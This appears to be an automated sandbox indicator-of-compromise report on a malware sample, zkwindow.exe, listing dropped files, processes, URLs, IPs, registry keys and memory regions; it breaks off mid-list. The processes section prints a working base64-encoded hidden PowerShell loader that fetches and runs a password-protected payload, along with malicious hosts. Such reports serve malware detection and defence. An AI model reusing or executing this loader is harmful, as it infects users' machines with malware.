IOC Report
zkwindow.exe

loading gif

Files

File Path
Type
Category
Malicious
zkwindow.exe
PE32+ executable (GUI) x86-64, for MS Windows
initial sample
malicious
C:\Users\user\AppData\Local\Temp\7zip\7za.exe
PE32+ executable (console) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\ISCmplr.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\isscint.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\bmrmmwsgmayisp
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\fe387de893ce4f2ca49f16029d364dc1
Zip archive data, at least v2.0 to extract, compression method=deflate
dropped
malicious
C:\Users\user\AppData\Local\Temp\vpdcuvm
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\AppData\Roaming\DH_Http\ISCmplr.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Roaming\DH_Http\isscint.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\MSBuild.exe.log
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\7z1900-x64.zip
Zip archive data, at least v2.0 to extract, compression method=deflate
dropped
C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\presidio.json
data
dropped
C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\tributary.iso
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3zbkqbiq.dgd.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4ltawufd.hkp.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ti3lsgck.3yf.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w5goga5z.kjz.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\a722c6c5
data
dropped
C:\Users\user\AppData\Local\Temp\b3be1509
data
dropped
C:\Users\user\AppData\Local\Temp\mhpcwjai
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Mar 10 19:40:07 2025, mtime=Mon Mar 10 19:40:15 2025, atime=Fri Mar 7 11:55:00 2025, length=2871768, window=hide
dropped
C:\Users\user\AppData\Local\Temp\tmp77B5.tmp
SQLite 3.x database, last written using SQLite version 3046000, file counter 19, database pages 10, 1st free page 10, free pages 3, cookie 0x17, schema 4, UTF-8, version-valid-for 19
dropped
C:\Users\user\AppData\Local\Temp\tmpC79B.tmp
SQLite 3.x database, last written using SQLite version 3046000, file counter 19, database pages 10, 1st free page 10, free pages 3, cookie 0x17, schema 4, UTF-8, version-valid-for 19
dropped
C:\Users\user\AppData\Local\Temp\tmpC7EA.tmp
SQLite 3.x database, last written using SQLite version 3046000, file counter 19, database pages 10, 1st free page 10, free pages 3, cookie 0x17, schema 4, UTF-8, version-valid-for 19
dropped
C:\Users\user\AppData\Roaming\DH_Http\presidio.json
data
dropped
C:\Users\user\AppData\Roaming\DH_Http\tributary.iso
data
dropped
\Device\ConDrv
ASCII text, with CRLF, CR line terminators
dropped
There are 19 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\zkwindow.exe
"C:\Users\user\Desktop\zkwindow.exe"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -w h -Nop -NonI -e"n"c WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAAgAD0AIABbAE4AZQB0AC4AUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbABUAHkAcABlAF0AOgA6AFQAbABzADEAMgAgAC0AYgBvAHIAIABbAE4AZQB0AC4AUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbABUAHkAcABlAF0AOgA6AFQAbABzADEAMwANAAoADQAKAGYAdQBuAGMAdABpAG8AbgAgAEcAZQB0AC0AWgBpAHAATABpAG4AawBGAHIAbwBtAFAAYQBnAGUAIAB7AA0ACgAgACAAIAAgAHAAYQByAGEAbQAoAFsAcwB0AHIAaQBuAGcAXQAkAHAAYQBnAGUAVQByAGwAKQANAAoAIAAgACAAIAAkAHIAZQBzAHAAbwBuAHMAZQAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJABwAGEAZwBlAFUAcgBsACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwANAAoAIAAgACAAIAAkAGwAaQBuAGsAIAA9ACAAJAByAGUAcwBwAG8AbgBzAGUALgBMAGkAbgBrAHMAIAB8ACAAVwBoAGUAcgBlAC0ATwBiAGoAZQBjAHQAIAB7ACAAJABfAC4AaAByAGUAZgAgAC0AbQBhAHQAYwBoACAAIgBcAC4AegBpAHAAIgAgAH0AIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ARgBpAHIAcwB0ACAAMQANAAoAIAAgACAAIABpAGYAIAAoACQAbABpAG4AawApACAAewANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJABsAGkAbgBrAC4AaAByAGUAZgAgAC0AbQBhAHQAYwBoACAAIgBeAGgAdAB0AHAAcwA/ADoALwAvACIAKQAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAAJABsAGkAbgBrAC4AaAByAGUAZgANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAIAAgACAAIABlAGwAcwBlACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAFUAcgBpACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBVAHIAaQAgACQAcgBlAHMAcABvAG4AcwBlAC4AQgBhAHMAZQBSAGUAcwBwAG8AbgBzAGUALgBSAGUAcwBwAG8AbgBzAGUAVQByAGkAKQAsACAAJABsAGkAbgBrAC4AaAByAGUAZgApACkALgBBAGIAcwBvAGwAdQB0AGUAVQByAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAZQBsAHMAZQAgAHsADQAKACAAIAAgACAAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAbgB1AGwAbAANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgANAAoAJABwAGEAZwBlADEAIAA9ACAAIgBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvADAAeABmADYARQBBADcAYgBGADUAZAAwADgAOQBGADQAMwA5AEUAYwA2AGUANwBhADEAMwAxADMAOAA4ADUANwA5AGQAMABDAGEAYQA4ADYAMgBkADQARQBFADAAIgANAAoAJABwAGEAZwBlADIAIAA9ACAAIgBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvADAAeABmADYARQBBADcAYgBGADUAZAAwADgAOQBGADQAMwA5AEUAYwA2AGUANwAwADEAMAAxADAAMQBhADgAOAA1ADcAOQBkADAAQwBhAGEAOAA2ADIAZAA0AEUARQAwACIADQAKACQAcwBlAHYAZQBuAFoAaQBwAFUAcgBsACAAPQAgAEcAZQB0AC0AWgBpAHAATABpAG4AawBGAHIAbwBtAFAAYQBnAGUAIAAkAHAAYQBnAGUAMQANAAoAJABtAGEAbgBhAGcAZQByAFoAaQBwAFUAcgBsACAAPQAgAEcAZQB0AC0AWgBpAHAATABpAG4AawBGAHIAbwBtAFAAYQBnAGUAIAAkAHAAYQBnAGUAMgANAAoAaQBmACAAKAAtAG4AbwB0ACAAJABzAGUAdgBlAG4AWgBpAHAAVQByAGwAKQAgAHsAIAByAGUAdAB1AHIAbgAgAH0ADQAKAGkAZgAgACgALQBuAG8AdAAgACQAbQBhAG4AYQBnAGUAcgBaAGkAcABVAHIAbAApACAAewAgAHIAZQB0AHUAcgBuACAAfQANAAoADQAKACQAcwBlAHYAZQBuAFoAaQBwAFoAaQBwAFAAYQB0AGgAIAA9ACAASgBvAGkAbgAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABFAE0AUAAgACIANwB6ADEAOQAwADAALQB4ADYANAAuAHoAaQBwACIADQAKACQAcwBlAHYAZQBuAFoAaQBwAEUAeAB0AHIAYQBjAHQAUABhAHQAaAAgAD0AIABKAG8AaQBuAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAEUATQBQACAAIgA3AHoAaQBwACIADQAKAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHMAZQB2AGUAbgBaAGkAcABVAHIAbAAgAC0ATwB1AHQARgBpAGwAZQAgACQAcwBlAHYAZQBuAFoAaQBwAFoAaQBwAFAAYQB0AGgAIAAtAFUAcwBlAEIAYQBzAGkAYwBQAGEAcgBzAGkAbgBnAA0ACgBFAHgAcABhAG4AZAAtAEEAcgBjAGgAaQB2AGUAIAAtAFAAYQB0AGgAIAAkAHMAZQB2AGUAbgBaAGkAcABaAGkAcABQAGEAdABoACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AUABhAHQAaAAgACQAcwBlAHYAZQBuAFoAaQBwAEUAeAB0AHIAYQBjAHQAUABhAHQAaAAgAC0ARgBvAHIAYwBlAA0ACgAkAHMAZQB2AGUAbgBaAGkAcABQAGEAdABoACAAPQAgAEoAbwBpAG4ALQBQAGEAdABoACAAJABzAGUAdgBlAG4AWgBpAHAARQB4AHQAcgBhAGMAdABQAGEAdABoACAAIgA3AHoAYQAuAGUAeABlACIADQAKAA0ACgAkAHoAaQBwAFAAYQB0AGgAIAA9ACAASgBvAGkAbgAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABFAE0AUAAgACgAWwBTAHkAcwB0AGUAbQAuAEcAdQBpAGQAXQA6ADoATgBlAHcARwB1AGkAZAAoACkALgBUAG8AUwB0AHIAaQBuAGcAKAAiAE4AIgApACkADQAKACQAegBpAHAAUABhAHMAcwB3AG8AcgBkACAAPQAgACIANQA0ADcAOABmAGgAagBkAEQAUwBIAEoASABEAFMASgBGAEgASgBTAEQAIwBAACQAQAAkACUAXgAjACQAJQBXAEQARgAhACIADQAKACQAcgBhAG4AZABvAG0ARgBvAGwAZABlAHIAIAA9ACAAIgBfACIAIAArACAAKABbAFMAeQBzAHQAZQBtAC4ARwB1AGkAZABdADoAOgBOAGUAdwBHAHUAaQBkACgAKQAuAFQAbwBTAHQAcgBpAG4AZwAoACIATgAiACkAKQANAAoAJABlAHgAdAByAGEAYwB0AFAAYQB0AGgAIAA9ACAASgBvAGkAbgAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABFAE0AUAAgACQAcgBhAG4AZABvAG0ARgBvAGwAZABlAHIADQAKAA0ACgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAzAA0ACgBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJABtAGEAbgBhAGcAZQByAFoAaQBwAFUAcgBsACAALQBPAHUAdABGAGkAbABlACAAJAB6AGkAcABQAGEAdABoACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwANAAoAdwBoAGkAbABlACAAKAAtAG4AbwB0ACAAKABUAGUAcwB0AC0AUABhAHQAaAAgACQAegBpAHAAUABhAHQAaAApACkAIAB7AA0ACgAgACAAIAAgAFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADMADQAKAH0ADQAKAA0ACgBOAGUAdwAtAEkAdABlAG0AIAAtAEkAdABlAG0AVAB5AHAAZQAgAEQAaQByAGUAYwB0AG8AcgB5ACAALQBQAGEAdABoACAAJABlAHgAdAByAGEAYwB0AFAAYQB0AGgAIAAtAEYAbwByAGMAZQAgAHwAIABPAHUAdAAtAE4AdQBsAGwADQAKAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcwBlAHYAZQBuAFoAaQBwAFAAYQB0AGgAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACIAeAAiACwAIgBgACIAJAB6AGkAcABQAGEAdABoAGAAIgAiACwAIgAtAG8AYAAiACQAZQB4AHQAcgBhAGMAdABQAGEAdABoAGAAIgAiACwAIgAtAHAAJAB6AGkAcABQAGEAcwBzAHcAbwByAGQAIgAsACIALQB5ACIAIAAtAFcAYQBpAHQADQAKAHcAaABpAGwAZQAgACgALQBuAG8AdAAgACgAVABlAHMAdAAtAFAAYQB0AGgAIAAkAGUAeAB0AHIAYQBjAHQAUABhAHQAaAApACkAIAB7AA0ACgAgACAAIAAgAFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADMADQAKAH0ADQAKAA0ACgAkAGUAeABlAEYAaQBsAGUAIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAZQB4AHQAcgBhAGMAdABQAGEAdABoACAALQBGAGkAbAB0AGUAcgAgACIAKgAuAGUAeABlACIAIAAtAEYAaQBsAGUAIAAtAFIAZQBjAHUAcgBzAGUAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ARgBpAHIAcwB0ACAAMQANAAoAaQBmACAAKAAkAGUAeABlAEYAaQBsAGUAKQAgAHsADQAKACAAIAAgACAAVQBuAGIAbABvAGMAawAtAEYAaQBsAGUAIAAtAFAAYQB0AGgAIAAkAGUAeABlAEYAaQBsAGUALgBGAHUAbABsAE4AYQBtAGUADQAKACAAIAAgACAAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANwANAAoAIAAgACAAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAkAGUAeABlAEYAaQBsAGUALgBGAHUAbABsAE4AYQBtAGUAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuAA0ACgB9AA==
malicious
C:\Users\user\AppData\Local\Temp\7zip\7za.exe
"C:\Users\user\AppData\Local\Temp\7zip\7za.exe" x "C:\Users\user\AppData\Local\Temp\fe387de893ce4f2ca49f16029d364dc1" -o"C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47" -p5478fhjdDSHJHDSJFHJSD#@$@$%^#$%WDF! -y
malicious
C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe
"C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe"
malicious
C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
malicious
C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe
"C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe"
malicious
C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
There are 3 hidden processes, click here to show them.

URLs

Name
IP
Malicious
https://main-connection.click/Download_StarW3_pack.zip8
unknown
malicious
http://92.255.85.36:9000/wbinjget?q=8587D7BC4236146899B093C1B42EFE08
92.255.85.36
malicious
https://rentry.o
unknown
https://duckduckgo.com/ac/?q=
unknown
https://pastebin.com/raw/DWCCqGB0
unknown
http://www.vmware.com/0
unknown
http://repository.certum.pl/cscasha2.cer0
unknown
http://ocsp.sectigo.com0
unknown
https://go.microsoft.co
unknown
https://jrsoftware.org/ismail.phpopenU
unknown
https://rentry.org
unknown
http://92.255.85.36:9000/wbinjget?q=8587D7BC4236146899B093C1B42EFE08P
unknown
https://contoso.com/License
unknown
https://rentry.co/0xf6EA7bF5d089F439Ec6e7a131388579d0Caa862d4EE0
unknown
https://rentry.co/0xf6ea7bf5d089f439ec6e7a131388579d0caa862d4ee0
unknown
http://ccsca2021.crl.certum.pl/ccsca2021.crl0s
unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
unknown
http://repository.certum.pl/ccsca2021.cer0
unknown
https://rentry.org/
unknown
https://www.google.com/images/branding/product/ico/googleg_alldp.ico
unknown
http://rentry.org
unknown
https://rentry.co/0xf6EA7bF5d089F439Ec6e7010101a88579d0Caa862d4EE0
unknown
http://92.255.85.36:9000t-
unknown
https://www.remobjects.com/ps
unknown
http://subca.ocsp-certum.com02
unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
unknown
http://subca.ocsp-certum.com01
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://www.innosetup.com/
unknown
https://sectigo.com/CPS0D
unknown
http://crl.certum.pl/ctnca2.crl0l
unknown
http://repository.certum.pl/ctnca2.cer09
unknown
https://jrsoftware.org0
unknown
https://jrsoftware.org/
unknown
https://jrsoftware.org/isinfo.phpopen
unknown
http://92.255.85.36:9000
unknown
http://ccsca2021.ocsp-certum.com05
unknown
http://www.microsoft.c
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://www.remobjects.com/psopenU
unknown
https://rentry.org/0xf6EA7bF5d089F439Ec6e7a131388579d0Caa862d4EE0
164.132.58.105
http://www.certum.pl/CPS0
unknown
https://cdn4.buysellads.net/pub/rentryorg.js?
unknown
https://pastebin.com/raw/DWCCqGB0PO
unknown
http://nuget.org/NuGet.exe
unknown
https://aka.ms/winsvr-2022-pshelp
unknown
https://main-connection.click/Download_StarW3_pack.zip
188.114.97.3
https://rentry.org/0xf6EA7bF5d089F439Ec6e7010101a88579d0Caa862d4EE0
164.132.58.105
https://sectigo.com/CPS0
unknown
http://repository.certum.pl/ctnca.cer09
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://schemas.xmlsoap.org/soap/encoding/
unknown
http://crl.certum.pl/ctnca.crl0k
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
https://rentry.co/static/icons/512.png
unknown
https://contoso.com/Icon
unknown
http://www.vmware.com/0/
unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
unknown
https://ac.ecosia.org?q=
unknown
https://main-connection.click/archive.
unknown
https://main-connection.clickp
unknown
https://main-connection.click
unknown
https://www.certum.pl/CPS0
unknown
http://www.symauth.com/cps0(
unknown
http://crl.certum.pl/cscasha2.crl0q
unknown
https://github.com/Pester/Pester
unknown
https://rentry.co/0xf6ea7bf5d089f439ec6e7010101a88579d0caa862d4ee0
unknown
https://main-connection.click/archive.zip
188.114.97.3
http://cscasha2.ocsp-certum.com04
unknown
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
unknown
https://www.ecosia.org/newtab/v20
unknown
http://main-connection.click
unknown
http://www.symauth.com/rpa00
unknown
https://duckduckgo.com/chrome_newtabv20
unknown
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
unknown
http://schemas.xmlsoap.org/wsdl/
unknown
https://jrsoftware.org/isdonate.phpopenj
unknown
http://www.info-zip.org/
unknown
https://aka.ms/pscore68
unknown
http://92.255.85.36:
unknown
https://www.innosetup.com
unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
unknown
https://gemini.google.com/app?q=
unknown
There are 75 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com
217.20.57.34
rentry.org
164.132.58.105
main-connection.click
188.114.97.3
pki-goog.l.google.com
142.250.184.227
c.pki.goog
unknown

IPs

IP
Domain
Country
Malicious
92.255.85.36
unknown
Russian Federation
malicious
164.132.58.105
rentry.org
France
188.114.97.3
main-connection.click
European Union

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASMANCS
FileDirectory
There are 19 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
5950000
direct allocation
page read and write
malicious
2DA0000
direct allocation
page read and write
malicious
1002000
unkown
page readonly
malicious
5DBA94C000
stack
page read and write
27BD000
trusted library allocation
page read and write
22CAE69D000
heap
page read and write
7E0000
heap
page read and write
3120000
heap
page read and write
7FFC3DA30000
trusted library allocation
page read and write
854000
heap
page read and write
401000
unkown
page execute read
7FFC3DA90000
trusted library allocation
page read and write
9A4000
unkown
page read and write
D84000
unkown
page read and write
A3C0000
unkown
page read and write
7F4000
heap
page read and write
854000
heap
page read and write
54B5000
trusted library allocation
page read and write
22CC8A0E000
heap
page read and write
1420000
heap
page read and write
6CEE000
stack
page read and write
54C0000
trusted library allocation
page read and write
22CB0866000
trusted library allocation
page read and write
2EF4000
unkown
page read and write
3AB000
stack
page read and write
5ABF000
trusted library allocation
page read and write
7FFC3D960000
trusted library allocation
page read and write
A9F000
heap
page read and write
5E10000
heap
page read and write
90E000
stack
page read and write
28BD000
trusted library allocation
page read and write
5DBA000
heap
page read and write
B51000
unkown
page execute read
5176000
trusted library allocation
page read and write
22CB21BD000
trusted library allocation
page read and write
1578000
unkown
page read and write
14B8000
heap
page read and write
12A0000
trusted library allocation
page read and write
4135000
trusted library allocation
page read and write
48BD000
stack
page read and write
850000
heap
page read and write
3110000
trusted library allocation
page read and write
529E000
stack
page read and write
305F000
unkown
page read and write
655000
unkown
page readonly
2570000
heap
page execute and read and write
255C000
stack
page read and write
53E0000
unkown
page read and write
22CC8988000
heap
page read and write
22CC86A8000
heap
page read and write
1641000
unkown
page readonly
22CB226D000
trusted library allocation
page read and write
22CC8687000
heap
page execute and read and write
CA513FE000
stack
page read and write
7DF43AFA0000
trusted library allocation
page execute and read and write
54CB000
trusted library allocation
page read and write
24D0000
trusted library allocation
page read and write
11F0000
heap
page read and write
22CB227C000
trusted library allocation
page read and write
D85000
unkown
page write copy
22CAE8B0000
heap
page read and write
5DA6000
heap
page read and write
7FFC3DAF0000
trusted library allocation
page read and write
2CCF000
trusted library allocation
page read and write
2DCF000
unkown
page read and write
25E9000
trusted library allocation
page read and write
22CAE659000
heap
page read and write
7FF7013FC000
unkown
page readonly
51AE000
direct allocation
page read and write
C8A000
unkown
page read and write
73D000
heap
page read and write
22CB21C3000
trusted library allocation
page read and write
7FFC3D7CD000
trusted library allocation
page execute and read and write
BB4000
unkown
page read and write
25CD000
trusted library allocation
page read and write
589E000
stack
page read and write
7FFC3DC20000
trusted library allocation
page read and write
7FFC3DBA0000
trusted library allocation
page read and write
22CC0481000
trusted library allocation
page read and write
5DB99B9000
stack
page read and write
22CC8790000
heap
page read and write
7FFC3D9E0000
trusted library allocation
page read and write
A48000
heap
page read and write
931000
heap
page read and write
7FFC3D8E0000
trusted library allocation
page execute and read and write
22CAE7F0000
heap
page read and write
D78000
unkown
page read and write
9A4000
unkown
page read and write
7FFC3DAC0000
trusted library allocation
page read and write
19C000
stack
page read and write
9A4000
unkown
page read and write
1441000
heap
page read and write
2ACE000
trusted library allocation
page read and write
22CB1131000
trusted library allocation
page read and write
CA512FE000
stack
page read and write
7C0000
unkown
page readonly
3131000
trusted library allocation
page read and write
4C9C000
trusted library allocation
page read and write
53C1000
unkown
page read and write
4B3D000
heap
page read and write
70AD000
stack
page read and write
854000
heap
page read and write
22CAE7B0000
heap
page readonly
A12000
unkown
page read and write
7FFC3DA40000
trusted library allocation
page read and write
381D000
trusted library allocation
page read and write
1180000
heap
page read and write
BC62EFF000
stack
page read and write
9A4000
unkown
page read and write
22CAE635000
heap
page read and write
28C8000
trusted library allocation
page read and write
22CB21B7000
trusted library allocation
page read and write
5DBA9CC000
stack
page read and write
2913000
trusted library allocation
page read and write
2ECE000
unkown
page read and write
24B0000
trusted library allocation
page read and write
4ECE000
stack
page read and write
7FF7013C1000
unkown
page execute read
854000
heap
page read and write
C6E000
unkown
page read and write
5C33000
trusted library allocation
page read and write
A1F000
unkown
page readonly
2EF0000
unkown
page read and write
5DBA7CF000
stack
page read and write
6D00000
heap
page read and write
13F0000
trusted library allocation
page read and write
4C50000
trusted library allocation
page read and write
63E000
unkown
page write copy
BC62B2C000
stack
page read and write
9A4000
unkown
page read and write
AD9000
heap
page read and write
87D000
heap
page read and write
22CAE6B7000
heap
page read and write
53D0000
unkown
page read and write
1F0DEEA0000
heap
page read and write
11ED000
